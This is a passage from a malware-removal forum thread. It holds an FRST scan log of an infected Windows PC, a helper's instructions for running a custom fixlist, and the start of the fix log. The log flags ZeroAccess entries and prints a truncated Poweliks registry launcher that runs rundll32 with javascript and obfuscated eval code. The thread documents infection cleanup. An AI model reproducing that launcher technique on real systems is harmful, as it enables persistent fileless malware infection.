HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [413696 2009-01-05] (Apple Inc.)
HKLM-x32\...\Run: [CanonSolutionMenuEx] => C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE [1612920 2011-08-04] (CANON INC.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2013\avgui.exe [4411952 2014-01-21] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKLM\...\InprocServer32: [Default-wbemess] wbemess.dll ATTENTION! ====> ZeroAccess?
HKLM\...D6A79037F57F\InprocServer32: [Default-fastprox] fastprox.dll ATTENTION! ====> ZeroAccess?
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Run: [SpybotSD TeaTimer] => C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Run: [SansaDispatch] => C:\Users\JP\AppData\Roaming\SanDisk\Sansa Updater\SansaDispatch.exe [79872 2010-10-16] (SanDisk Corporation)
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Run: [DownloadAccelerator] => C:\Program Files (x86)\DAP\DAP.EXE [4242064 2014-10-04] (Speedbit Ltd.)
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...409d6c4515e9\InprocServer32: [Default-shell32]  <==== ATTENTION!
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\Users\JP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Core Temp.lnk
ShortcutTarget: Core Temp.lnk -> C:\Program Files\Core Temp\Core Temp.exe ()
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x410DF1D8953FCD01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
BHO: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} ->  No File
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Microsoft Live Search Toolbar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> c:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll (Microsoft Corp.)
BHO-x32: SpeedBit Link Verification Helper -> {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} -> C:\Program Files (x86)\DAP\LinkVerifier.dll (Speedbit Ltd.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM-x32 - Microsoft Live Search Toolbar - {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - c:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll (Microsoft Corp.)
Toolbar: HKCU - No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} -  No File
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/C/0/C/C0CBBA88-A6F2-48D9-9B0E-1719D1177202/LegitCheckControl.cab
DPF: HKLM-x32 {6A060448-60F9-11D5-A6CD-0002B31F7455}
DPF: HKLM-x32 {8AD9C840-044E-11D1-B3E9-00805F499D93}
DPF: HKLM-x32 {CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA}
DPF: HKLM-x32 {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}
DPF: HKLM-x32 {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {E705A591-DA3C-4228-B0D5-A356DBA42FBF} http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://employee.bnsf.com/dana-cached/sc/JuniperSetupClient.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creative.com/Web/softwareupdate/ocx/110926/CTPID.cab
DPF: HKLM-x32 {FA5D9BCA-4653-49FB-9237-FFA947877414} http://192.168.1.10/ZDVR.CAB
Handler: ipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} -  No File
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: ipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 8.8.8.8 24.178.162.3 24.247.15.53

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 -> C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.25.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @RIM.com/WebSLLauncher,version=1.0 -> C:\Program Files (x86)\Common Files\Research In Motion\BBWebSLLauncher\NPWebSLLauncher.dll ()
FF Plugin-x32: @videolan.org/vlc,version=2.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM-x32\...\Firefox\Extensions: [daplinkchecker@speedbit.com] - C:\Program Files (x86)\DAP\daplinkchecker
FF Extension: DAP Link Checker - C:\Program Files (x86)\DAP\daplinkchecker [2014-10-04]

Chrome:
=======
CHR Profile: C:\Users\JP\AppData\Local\Google\Chrome\User Data\Default

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 57xx SteelVine Manager; C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVine.exe [1282048 2007-08-20] () [File not signed]
R2 AdobeActiveFileMonitor10.0; C:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe [169624 2011-09-01] (Adobe Systems Incorporated)
R2 AntsCMSService; C:\Program Files (x86)\Single Video Surveillance Client\AntsCMSService.exe [2403328 2013-03-07] (ANTS) [File not signed]
R2 AntsSTSService; C:\Program Files (x86)\Single Video Surveillance Client\AntsSTSService.exe [2038784 2013-03-02] () [File not signed]
S2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2013\avgidsagent.exe [4939312 2013-07-04] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe [283136 2013-11-20] (AVG Technologies CZ, s.r.o.)
S3 Creative ALchemy AL6 Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\AL6Licensing.exe [79360 2012-08-02] (Creative Labs) [File not signed]
S3 Creative Audio Engine Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [79360 2012-08-02] (Creative Labs) [File not signed]
S3 Creative Media Toolbox 6 Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\MT6Licensing.exe [79360 2012-08-02] (Creative Labs) [File not signed]
R2 CTAudSvcService; C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe [286720 2010-02-12] (Creative Technology Ltd) [File not signed]
R2 HPBtnSrv; C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe [192512 2008-09-30] () [File not signed]
R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2011-06-20] (Hewlett-Packard Company) [File not signed]
R2 nTuneService; C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe [276584 2009-11-06] (NVIDIA)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [117264 2009-10-20] (CACE Technologies, Inc.)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 VZWConfigService; C:\Program Files (x86)\Novatel Wireless\LTE Support\VZWMSConfig.exe [218160 2012-04-16] (Novatel Wireless Inc.)
R2 MYSQL; "C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld" MYSQL [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 61883; C:\Windows\System32\DRIVERS\61883.sys [60288 2009-07-13] (Microsoft Corporation)
S3 AtiHDAudioService; C:\Windows\System32\drivers\AtihdW76.sys [96768 2013-02-14] (Advanced Micro Devices) [File not signed]
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [246072 2013-11-25] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [71480 2013-07-20] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [206648 2013-07-20] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [311608 2013-07-20] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [116536 2013-07-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [45880 2013-10-23] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [240952 2014-04-15] (AVG Technologies CZ, s.r.o.)
R2 NPF; C:\Windows\System32\drivers\npf.sys [47632 2009-10-20] (CACE Technologies, Inc.)
R3 nvoclk64; C:\Windows\System32\DRIVERS\nvoclk64.sys [42088 2009-09-15] (NVIDIA Corp.)
S3 NwGPSOverWiFi64; C:\Windows\System32\DRIVERS\nwvcomnet64.sys [37888 2012-09-27] (Novatel Wireless Inc.)
S3 NWUSBLAN_4620; C:\Windows\System32\DRIVERS\nwblan_4620.sys [47472 2012-09-27] (Belcarra Technologies)
R3 nwusbserial; C:\Windows\System32\DRIVERS\nwvcomnet64.sys [37888 2012-09-27] (Novatel Wireless Inc.)
R3 PPorts; C:\Windows\System32\DRIVERS\PPorts.sys [95744 2009-07-23] ()
R3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [44032 2011-07-20] (Research in Motion Ltd)
S3 RivaTuner64; C:\Program Files (x86)\RivaTuner v2.24 MSI Master Overclocking Arena 2009 edition\RivaTuner64.sys [19952 2010-01-06] ()
S3 Ser2ph; C:\Windows\System32\DRIVERS\ser2ph64.sys [89600 2008-03-06] (Prolific Technology Inc.)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-10-20] ()
R3 ALSysIO; \??\C:\Users\JP\AppData\Local\Temp\ALSysIO64.sys [X]
S3 PcdrNdisuio; syswow64\drivers\pcdrndisuio.sys [X]
S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [X]
S3 RimUsb; System32\Drivers\RimUsb_AMD64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-20 18:16 - 2014-10-20 18:16 - 00002606 _____ () C:\Users\JP\Desktop\JRT.txt
2014-10-20 18:12 - 2014-10-20 18:12 - 00000000 ____D () C:\Windows\ERUNT
2014-10-20 17:38 - 2014-10-20 17:45 - 00000000 ____D () C:\AdwCleaner
2014-10-20 08:30 - 2014-10-20 18:18 - 00000000 ____D () C:\FRST
2014-10-18 22:06 - 2014-10-18 22:06 - 00000064 _____ () C:\Windows\GPlrLanc.dat
2014-10-18 15:21 - 2014-10-18 15:21 - 00018835 _____ () C:\Users\JP\Desktop\dds.txt
2014-10-18 15:21 - 2014-10-18 15:21 - 00017360 _____ () C:\Users\JP\Desktop\attach.txt
2014-10-18 00:12 - 2014-10-18 01:08 - 00000000 ____D () C:\Users\JP\AppData\Local\CrashDumps
2014-10-17 22:49 - 2014-10-17 22:50 - 00002428 _____ () C:\Users\JR\Desktop\Rkill.txt
2014-10-17 22:43 - 2014-10-17 22:43 - 00000000 ____D () C:\Windows\System32\Tasks\Safer-Networking
2014-10-17 22:42 - 2014-10-17 22:46 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-10-17 22:42 - 2014-10-17 22:42 - 00001397 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-10-17 22:42 - 2014-10-17 22:42 - 00001385 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-10-17 22:42 - 2014-10-17 22:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-10-17 22:42 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe
2014-10-17 22:37 - 2014-10-20 17:47 - 00000666 _____ () C:\Windows\PFRO.log
2014-10-17 22:16 - 2014-10-20 17:15 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-10-17 22:16 - 2014-10-17 22:16 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-17 21:36 - 2014-10-17 21:36 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Share-to-Web Upload Folder
2014-10-17 21:10 - 2014-10-17 21:10 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Adobe
2014-10-17 21:09 - 2014-10-17 21:09 - 00001449 _____ () C:\Users\JR\Desktop\IE.lnk
2014-10-17 21:09 - 2014-10-17 21:09 - 00001415 _____ () C:\Users\JR\Desktop\IE (64-bit).lnk
2014-10-17 20:58 - 2014-10-17 20:58 - 00119024 _____ () C:\Users\JR\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Intel Corporation
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Canon
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\AVG2013
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\ATI
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Local\Hewlett-Packard
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Local\Avg2013
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Local\ATI
2014-10-17 20:57 - 2014-10-17 20:57 - 00001449 _____ () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-17 20:57 - 2014-10-17 20:57 - 00001415 _____ () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-10-17 20:57 - 2014-10-17 20:57 - 00000020 ___SH () C:\Users\JR\ntuser.ini
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR\AppData\Local\VirtualStore
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR\AppData\Local\NVIDIA Corporation
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR\AppData\Local\Adobe
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR
2014-10-17 20:57 - 2012-09-21 09:10 - 00000000 ____D () C:\Users\JR\AppData\Roaming\TuneUp Software
2014-10-17 20:57 - 2009-12-13 17:53 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Macromedia
2014-10-17 20:57 - 2009-12-03 18:41 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Recovery Manager
2014-10-17 20:57 - 2009-07-13 23:54 - 00000000 ___RD () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-17 20:57 - 2009-07-13 23:49 - 00000000 ___RD () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-17 20:22 - 2014-10-17 20:28 - 00005786 _____ () C:\Users\JP\Desktop\Rkill.txt
2014-10-17 19:48 - 2014-10-20 17:54 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-17 19:47 - 2014-10-20 17:53 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-17 19:47 - 2014-10-20 17:53 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-17 19:47 - 2014-10-20 17:53 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-17 19:47 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-17 19:47 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-17 18:43 - 2014-10-20 17:48 - 00000560 _____ () C:\Windows\setupact.log
2014-10-17 18:43 - 2014-10-17 18:43 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-04 14:56 - 2014-10-17 00:48 - 00000000 ____D () C:\Users\Public\Documents\Speedbit
2014-10-04 14:51 - 2014-10-20 16:55 - 00001290 _____ () C:\Users\JP\Desktop\My DAP Downloads.lnk
2014-10-04 14:51 - 2014-10-04 14:51 - 00001041 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Download Accelerator Plus (DAP).lnk
2014-10-04 14:51 - 2014-10-04 14:51 - 00000941 _____ () C:\Users\JP\Desktop\DAP.lnk
2014-10-04 14:51 - 2014-10-04 14:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Download Accelerator Plus (DAP)

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-20 18:18 - 2012-04-23 21:54 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-20 17:56 - 2009-07-13 23:45 - 00017168 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-20 17:56 - 2009-07-13 23:45 - 00017168 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-20 17:54 - 2009-07-14 00:13 - 00730384 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-20 17:52 - 2011-12-29 02:14 - 01735147 _____ () C:\Windows\WindowsUpdate.log
2014-10-20 17:49 - 2009-12-03 18:17 - 00000000 ____D () C:\ProgramData\Temp
2014-10-20 17:48 - 2013-01-30 22:44 - 00000354 _____ () C:\Windows\Tasks\ROC_PAID_JAN2013_TB_rmv.job
2014-10-20 17:48 - 2013-01-26 11:51 - 00000354 _____ () C:\Windows\Tasks\ROC_JAN2013_TB_rmv.job
2014-10-20 17:48 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-20 17:38 - 2012-09-08 10:10 - 00000000 ____D () C:\ProgramData\MFAData
2014-10-20 16:23 - 2012-08-06 17:29 - 00000000 ____D () C:\Users\JP\AppData\Roaming\vlc
2014-10-20 08:19 - 2009-12-03 18:13 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-10-17 22:43 - 2009-12-15 23:07 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-10-17 22:37 - 2009-12-15 23:07 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy
2014-10-17 19:47 - 2012-05-31 22:39 - 00000000 ____D () C:\Users\JP\AppData\Roaming\Malwarebytes
2014-10-17 19:47 - 2009-12-15 21:35 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-17 19:47 - 2009-12-15 21:35 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-10-17 00:29 - 2013-01-21 01:54 - 00000000 ____D () C:\Windows\Minidump
2014-10-08 02:44 - 2010-03-05 23:29 - 00000049 _____ () C:\Windows\NeroDigital.ini
2014-10-04 22:22 - 2012-05-31 22:54 - 00000000 ____D () C:\Users\JP\Documents\Vegas Movie Studio PE 9.0 Projects
2014-10-04 14:52 - 2014-01-14 17:49 - 00000000 ____D () C:\Program Files (x86)\DAP
2014-10-04 14:51 - 2014-01-14 17:49 - 00000000 ____D () C:\ProgramData\SpeedBit
2014-10-04 14:51 - 2012-05-30 22:39 - 00000000 ___RD () C:\Users\JP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-01 11:11 - 2009-12-15 21:35 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-09-26 14:50 - 2012-11-18 15:51 - 00003168 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForJP
2014-09-26 14:50 - 2012-11-18 15:51 - 00000320 _____ () C:\Windows\Tasks\HPCeeScheduleForJP.job
2014-09-24 03:36 - 2012-04-23 21:54 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-09-24 03:36 - 2012-04-23 21:54 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-09-24 03:36 - 2011-05-21 10:17 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

ZeroAccess:
C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}
C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}\@

Some content of TEMP:
====================
C:\Users\JP\AppData\Local\Temp\cabex.dll
C:\Users\JP\AppData\Local\Temp\dllnt_dump.dll
C:\Users\JP\AppData\Local\Temp\Quarantine.exe
C:\Users\JP\AppData\Local\Temp\sqlite3.dll
C:\Users\JP\AppData\Local\Temp\VARemove.exe
C:\Users\JP\AppData\Local\Temp\VAUninstall.exe
C:\Users\JR\AppData\Local\Temp\dllnt_dump.dll

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-16 19:00

==================== End Of Log ============================



#7 padjr

padjr
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:09:05 AM

Posted 20 October 2014 - 06:32 PM

rkill logs before and after attached

Attached Files



#8 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 4,087 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:10:05 AM

Posted 21 October 2014 - 01:25 PM

Please save all tools on your desktop.

First,
  • Please download the attached fixlist.txt file and save it to the same location as FRST
Note: It's important that both files, FRST.exe/FRST64.exe and fixlist.txt are in the same location or the fix will not work
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
  • Run FRST.exe/FRST64.exe and press the Fix button just once and wait
  • If for some reason the tool needs a restart, please make sure you let the system restart normally, then let the tool complete its run
  • When finished, FRST will generate a log (Fixlog.txt) in the same location the tool was run, please post it to your reply
Next,
  • Run FRST. (if you have Windows Vista / Windows 7 / Windows 8: Please do a Right click on the FRST icon and select Run as Administrator)
  • Click Scan to start FRST.
  • When FRST finishes scanning, a log, FRST.txt, will open.
  • Copy (Ctrl+C) and Paste (Ctrl+V) the contents of this log into your next post please.

Attached Files


~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.

unite_blue.png
 
 


#9 padjr

padjr
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:09:05 AM

Posted 21 October 2014 - 09:28 PM

Here are the logs. The multiple processes of COM Surrogates that were piling up have stopped. Now just one or two popped up and shut down a couple times, now all quiet. I'm not sure if that's normal or what normal is with COM Surrogates.

 

 

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 21-10-2014
Ran by JP at 2014-10-21 20:48:57 Run:1
Running from C:\Users\JP\Desktop
Loaded Profile: JP (Available profiles: JP & JR)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
HKLM-x32\...\Run: [] => [X]
HKLM\...\InprocServer32: [Default-wbemess] wbemess.dll ATTENTION! ====> ZeroAccess?
HKLM\...D6A79037F57F\InprocServer32: [Default-fastprox] fastprox.dll ATTENTION! ====> ZeroAccess?
